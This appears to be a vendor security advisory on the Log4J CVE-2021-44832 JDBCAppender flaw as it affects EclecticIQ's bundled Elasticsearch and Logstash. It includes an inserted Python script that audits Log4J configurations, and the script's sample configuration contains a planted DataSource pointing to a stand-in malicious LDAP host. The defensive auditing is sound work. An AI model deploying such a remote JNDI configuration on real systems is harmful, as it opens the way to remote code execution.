EIQ-2022-0002

ID

EIQ-2022-0002

CVE

CVE-2021-44832

Description

Log4J ≤2.17.0 is vulnerable to remote code execution through its JDBCAppender if an attacker can modify the Log4J configuration.

Date

6 Jan 2022

Severity

1 - LOW

CVSSv3 score

6.6

Status

Mitigated by Elasticsearch and Logstash defaults.

Assessment

Log4J 2.17.0 and earlier are vulnerable to remote code execution in the specific case where an attacker:

  1. Manages to compromise and modify Log4J configuration.

  2. Modifies Log4J configuration to load data from a malicious LDAP server.

Elastic states that Elasticsearch and Logstash are not vulnerable because defaults require an attacker to have cluster administrator permissions in order to modify Log4J configuration files and exploit this vulnerability. Elasticsearch and Logstash are susceptible only if these defaults are changed.
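The configuration-tampering step above is the part a defender can audit directly. The following script is an added example, not part of this advisory or of Elastic's or EclecticIQ's tooling: it parses a Log4J 2 XML configuration and flags every JDBC appender whose DataSource JNDI name falls outside the local `java:` namespace, which is the restriction Log4J 2.17.1 enforces for this appender. The sample configuration, the appender names and the `attacker.example.invalid` host are constructed for the example.

```python
"""Audit a Log4J 2 XML configuration for JDBC appenders whose DataSource
points outside the local ``java:`` JNDI namespace (added example; the
sample configuration below is constructed, not taken from any product)."""
import xml.etree.ElementTree as ET

# Constructed sample: one local DataSource as an operator would write it,
# and one that someone with write access to the file could have planted.
SAMPLE_CONFIG = """<Configuration status="warn">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT"/>
    <JDBC name="LocalDb" tableName="application_log">
      <DataSource jndiName="java:/comp/env/jdbc/LoggingDataSource"/>
      <Column name="eventDate" isEventTimestamp="true"/>
    </JDBC>
    <JDBC name="Planted" tableName="application_log">
      <DataSource jndiName="ldap://attacker.example.invalid:1389/x"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="Console"/></Root>
  </Loggers>
</Configuration>
"""


def attr_ci(element, wanted):
    """Case-insensitive attribute lookup; Log4J treats attribute names that way."""
    for key, value in element.attrib.items():
        if key.lower() == wanted.lower():
            return value
    return ""


def is_local_jndi_name(name):
    """Mirror the 2.17.1 rule: only names in the java: namespace are accepted."""
    return name.strip().lower().startswith("java:")


def audit_log4j_config(xml_text):
    """Return (appender_name, jndi_name) for every JDBC DataSource that is not
    confined to java:. A missing jndiName is reported as an empty string so
    that a DataSource with no usable name is still surfaced for review."""
    root = ET.fromstring(xml_text)
    findings = []
    for element in root.iter():
        # Element names are matched case-insensitively, as Log4J does.
        if element.tag.lower() != "jdbc":
            continue
        appender = attr_ci(element, "name") or "<unnamed>"
        for child in element:
            if child.tag.lower() != "datasource":
                continue
            jndi = attr_ci(child, "jndiName")
            if not is_local_jndi_name(jndi):
                findings.append((appender, jndi))
    return findings


if __name__ == "__main__":
    for appender, jndi in audit_log4j_config(SAMPLE_CONFIG):
        print(f"appender {appender!r}: DataSource jndiName {jndi!r} "
              f"is outside the java: namespace")
```

On an ELK host, run `audit_log4j_config` over the deployed `log4j2.properties`/XML files with the same privileges the cluster administrator role would need to edit them; an empty result means no JDBC appender is configured to resolve a remote JNDI name, which is the condition the advisory's mitigation relies on.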

Kibana and Neo4J are not affected.

See Elastic’s updated security advisory for more information.

Intelligence Center (IC) versions 2.11.1, 2.10.4, and 2.9.4 come bundled with Elasticsearch, Logstash, and Kibana (ELK) 7.16.2. Users on these IC versions can upgrade from ELK 7.16.2 to 7.16.3 without having to upgrade the IC itself.

Please refer to Elastic’s advice on when ELK 7.16.3 will be available. EclecticIQ will notify IC customers when ELK 7.16.3 is available from EclecticIQ mirrors.

Mitigation

Mitigated by Elasticsearch and Logstash defaults.

Affected versions

2.11.1 and earlier; 2.10.4 and earlier; 2.9.4 and earlier.

Notes

N/A